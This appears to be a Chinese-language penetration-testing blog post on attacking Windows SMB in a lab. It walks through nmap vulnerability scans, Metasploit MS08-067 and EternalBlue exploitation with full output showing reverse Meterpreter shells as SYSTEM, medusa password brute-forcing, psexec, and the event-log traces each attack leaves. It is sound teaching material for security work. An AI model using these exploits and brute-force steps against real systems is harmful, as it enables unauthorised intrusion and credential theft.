文章目录
前言
在互联网上,几乎所有的windows主机都开启了文件共享功能,这个功能是通过smb协议来实现的,因此,作为渗透测试工程师对于smb服务相关漏洞的理解必须要全面且深刻。
一、SMB是什么?
服务器信息块(SMB)是一个网络文件共享协议,windows系统集成smb服务,并默认开启445端口运行smb服务。我们可以通过右键文件夹,共享选项卡将文件通过smb协议发布到网络上,供其他主机访问。
二、SMB信息收集
1.SMB历史版本
| 版本 | 操作系统 |
|---|---|
| the old version | Windows NT 4.0 in 1996 |
| SMB 1.0 | Windows 2000,Windows XP,Server 2003,Server 2003 R2 |
| SMB 2.0 | Windows Vista , Server 2008 |
| SMB 2.1 | Windows 7 , Server 2008 R2 |
| SMB 3.0 | Windows 8 , Server 2012 |
| SMB 3.02 | Windows 8.1 , Server 2012 R2 |
| SMB 3.1 | Windows 10 , Server 2016 |
| SMB 3.1.1 | Windows 10 , Server 2016 |
2.nmap扫描
- -A 全面扫描
nmap -p445 -A -T4 192.168.0.131
┌──(root💀kali20204)-[~]
└─# nmap -p445 -A -T4 192.168.0.131
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-06 21:39 EST
Nmap scan report for 192.168.0.131
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows Server 2003 3790 Service Pack 2 microsoft-ds
MAC Address: 00:0C:29:F6:46:0B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows_server_2003
Host script results:
|_clock-skew: mean: -4h00m01s, deviation: 5h39m23s, median: -8h00m01s
|_nbstat: NetBIOS name: QD-4F18765D03A8, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:f6:46:0b (VMware)
| smb-os-discovery:
| OS: Windows Server 2003 3790 Service Pack 2 (Windows Server 2003 5.2)
| OS CPE: cpe:/o:microsoft:windows_server_2003::sp2
| Computer name: qd-4f18765d03a8
| NetBIOS computer name: QD-4F18765D03A8\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-02-07T10:39:28+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms 192.168.0.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds
- 已知主机名,扫描探测主机IP
如上图,我们在连入一个局域网后,网络上会自动出现共享文件的计算机名,那么知道计算机名ROOT-PC,如何快速找到其对应ip地址呢。从上面的全面扫描可以知道,使用nbstat模块扫描C段就可以得到相应主机名与ip地址对应关系。
nmap -p445 --script nbstat 192.168.0.0/24
┌──(root💀kali20204)-[~]
└─# nmap -p445 --script nbstat 192.168.0.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-06 22:28 EST
Nmap scan report for dlinkrouter (192.168.0.1)
Host is up (0.0017s latency).
...
...
Nmap scan report for 192.168.0.104
Host is up (0.00027s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:EC:D1:63 (VMware)
Host script results:
| nbstat: NetBIOS name: ROOT-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ec:d1:63 (VMware)
| Names:
| ROOT-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| ROOT-PC<20> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
...
...
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.56 seconds
- 漏洞探测
nmap -p445 --script smb-vuln* 192.168.0.131
┌──(root💀kali20204)-[~]
└─# nmap -p445 --script smb-vuln* 192.168.0.131
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-06 22:04 EST
Nmap scan report for 192.168.0.131
Host is up (0.00029s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:F6:46:0B (VMware)
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 6.04 seconds
探测结果显示该主机包含ms08-067和ms17-010两个漏洞可供利用。
3.kali工具
- enum4linx
enum4linux 192.168.0.104
- smbclient
smbclient -L //192.168.0.104/kms -U smb%123456
┌──(root💀kali20204)-[~]
└─# smbclient -L //192.168.0.104/kms -U smb%123456
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk 远程管理
C$ Disk 默认共享
IPC$ IPC 远程 IPC
KMS Disk
Users Disk
SMB1 disabled -- no workgroup available
三、漏洞利用
1.ms08-067
查找利用模块,配置options,run利用漏洞。
msf6 > search type:exploit name:08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netap
2.ms17-010
- 模块ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > search type:exploit name:17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
选择exploit/windows/smb/ms17_010_eternalblue模块,并且配置options。这里需要注意的是本模块中,这个模块的target只有windows 7和Server 2008 R2两个操作系统可使用,同时payload选项多是64位的,因此在对类似Server 2003这样32位操作系统测试时候往往会失败。对于win8可以选择另一模块。
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > ru
[-] Unknown command: ru.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.0.164:4444
[*] 192.168.0.104:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.104:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.104:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.104:445 - Connecting to target for exploitation.
[+] 192.168.0.104:445 - Connection established for exploitation.
[+] 192.168.0.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.104:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.104:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
[*] 192.168.0.104:445 - 0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic
[*] 192.168.0.104:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[+] 192.168.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.104:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.104:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.104:445 - Starting non-paged pool grooming
[+] 192.168.0.104:445 - Sending SMBv2 buffers
[+] 192.168.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.104:445 - Sending final SMBv2 buffers.
[*] 192.168.0.104:445 - Sending last fragment of exploit packet!
[*] 192.168.0.104:445 - Receiving response from exploit packet
[+] 192.168.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.104:445 - Sending egg to corrupted connection.
[*] 192.168.0.104:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.104
[*] Meterpreter session 1 opened (192.168.0.164:4444 -> 192.168.0.104:49204) at 2021-02-07 02:39:29 -0500
[+] 192.168.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
- 模块ms17_010_psexec,可对Server 2003成功利用。
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.0.164:4444
[*] 192.168.0.131:445 - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 192.168.0.131:445 - Filling barrel with fish... done
[*] 192.168.0.131:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.0.131:445 - [*] Preparing dynamite...
[*] 192.168.0.131:445 - Trying stick 1 (x64)...Miss
[*] 192.168.0.131:445 - [*] Trying stick 2 (x86)...Boom!
[*] 192.168.0.131:445 - [+] Successfully Leaked Transaction!
[*] 192.168.0.131:445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.0.131:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.0.131:445 - Reading from CONNECTION struct at: 0x963df8c8
[*] 192.168.0.131:445 - Built a write-what-where primitive...
[+] 192.168.0.131:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.0.131:445 - Selecting native target
[*] 192.168.0.131:445 - Uploading payload... mVmoGKcC.exe
[*] 192.168.0.131:445 - Created \mVmoGKcC.exe...
[+] 192.168.0.131:445 - Service started successfully...
[*] Sending stage (175174 bytes) to 192.168.0.131
[*] 192.168.0.131:445 - Deleting \mVmoGKcC.exe...
[*] Meterpreter session 6 opened (192.168.0.164:4444 -> 192.168.0.131:1032) at 2021-02-07 20:14:41 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
3.爆破smb用户密码
为何要爆破smb用户密码?因为管理员在设置账户密码时会存在通用的情况,如果我们爆破的smb账户和密码,而目标机还开启了3389远程,我们就可以使用该密码去尝试登陆3389。首先,列出medusa支持的爆破模块。
┌──(root💀kali20204)-[~]
└─# medusa -d 1 ⨯
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
Available modules in "." :
Available modules in "/usr/lib/x86_64-linux-gnu/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.1
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.1
+ svn.mod : Brute force module for Subversion sessions : version 2.1
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
开始爆破,成功获得密码123456.
medusa -h 192.168.0.131 -u smb -P word.txt -M smbnt
┌──(root💀kali20204)-[~]
└─# medusa -h 192.168.0.131 -u smb -P word.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [smbnt] Host: 192.168.0.131 (1 of 1, 0 complete) User: smb (1 of 1, 0 complete) Password: 1234 (1 of 10 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.131 (1 of 1, 0 complete) User: smb (1 of 1, 0 complete) Password: 132 (2 of 10 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.131 (1 of 1, 0 complete) User: smb (1 of 1, 0 complete) Password: jkdjkfjdkf (3 of 10 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.131 (1 of 1, 0 complete) User: smb (1 of 1, 0 complete) Password: lkajflslkfnknvclk (4 of 10 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.131 (1 of 1, 0 complete) User: smb (1 of 1, 0 complete) Password: ksjdlkjle] (5 of 10 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.131 (1 of 1, 0 complete) User: smb (1 of 1, 0 complete) Password: jkjdlasjoieuoie (6 of 10 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.131 (1 of 1, 0 complete) User: smb (1 of 1, 0 complete) Password: jkljldajlkf (7 of 10 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.131 (1 of 1, 0 complete) User: smb (1 of 1, 0 complete) Password: 123456 (8 of 10 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.0.131 User: smb Password: 123456 [SUCCESS (ADMIN$ - Access Denied)]
4.PSEXEC
msf漏洞利用模块
exploit/windows/smb/psexec
psexec使用条件:smb用户是管理员,有写和执行权限。
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.0.164:4444
[*] 192.168.0.131:445 - Connecting to the server...
[*] 192.168.0.131:445 - Authenticating to 192.168.0.131:445 as user 'administrator'...
[*] 192.168.0.131:445 - Selecting native target
[*] 192.168.0.131:445 - Uploading payload... lMGPXjUf.exe
[*] 192.168.0.131:445 - Created \lMGPXjUf.exe...
[+] 192.168.0.131:445 - Service started successfully...
[*] Sending stage (175174 bytes) to 192.168.0.131
[*] 192.168.0.131:445 - Deleting \lMGPXjUf.exe...
[*] Meterpreter session 2 opened (192.168.0.164:4444 -> 192.168.0.131:1029) at 2021-02-07 03:32:46 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
四、日志痕迹
1.客户端smb登录凭据
当我们使用某个用户登录smb服务器查看共享文件时,会弹出登录认框如下图
当我们登录同时勾选记住我的凭据,下次不论是否注销当前用户,再次登录远程服务器文件夹时,都不需要输入密码。此时可以在控制面板->用户账户->凭据管理器中编辑或删除相关windows凭据,删除凭据并注销用户后,再次登录会再弹出登录认证框。在第一次登录后,如果当前用户不注销,在当前状态下凭据会保存在缓存中,第二次登录也无需密码。
2.服务端日志
对于smb登录在事件查看器–安全性,会有登录记录,这里事件540会记录登录用户的主机名和ip地址。
对于模块ms17_010_psexec的渗透攻击,事件查看器的安全性日志未留下任何日志,而系统日志留下如下信息。分别是一串随机字符名称的服务开始、运行、停止三个状态记录,这也侧面反映了msf无文件上传的理念。
我们在攻击机的msf命令执行界面也能找到上面三条状态的相应状态Uploading、Created、Service started、Deleting。
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.0.164:4444
...
...
[*] 192.168.0.131:445 - Selecting native target
[*] 192.168.0.131:445 - Uploading payload... qomBhBgw.exe
[*] 192.168.0.131:445 - Created \qomBhBgw.exe...
[+] 192.168.0.131:445 - Service started successfully...
[*] Sending stage (175174 bytes) to 192.168.0.131
[*] 192.168.0.131:445 - Deleting \qomBhBgw.exe...
[*] Meterpreter session 8 opened (192.168.0.164:4444 -> 192.168.0.131:1035) at 2021-02-07 20:42:21 -0500
meterpreter >
对于exploit/windows/smb/psexec模块,事件查看器的安全性日志会留下system用户的事件日志,如下。
并且会在事件540记录administrator登录的ip地址
系统日志与之前相类似,不再赘述。
总结
本文通过对smb搭建入门,记录了smb服务的常规渗透套路,对于更多的关于NTML-hash的获取,会在后面的文章继续探究。
3297
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
